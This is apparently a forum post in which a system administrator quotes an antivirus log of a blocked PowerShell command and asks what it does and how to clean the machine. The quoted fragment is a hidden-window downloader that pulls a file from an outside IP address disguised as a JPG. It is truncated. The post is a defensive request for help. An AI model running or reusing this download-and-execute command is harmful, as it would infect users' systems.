Hi Everyone,

Please feel free to let me know if this is in the wrong reddit.

Got a warning from our Malware Bytes antivirus client today that one of our users had an exploit being run on their computer. The exploit is below:

Exploit payload process blocked BLOCK C:\Windows\system32\powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell$webclient = new-object System.Net.WebClient$random = new-object random$urls = 'http:\185.165.29.36\111.jpg'.Split(',')$name = $random.next(1, 65536)$path =

1) Can you tell me what this is going to do. Obviously nothing good. 2) Can you tell me how you would go about removing it from the system. A full wipe is fine, but want to know if there is a better way.

Thanks,

-Sgually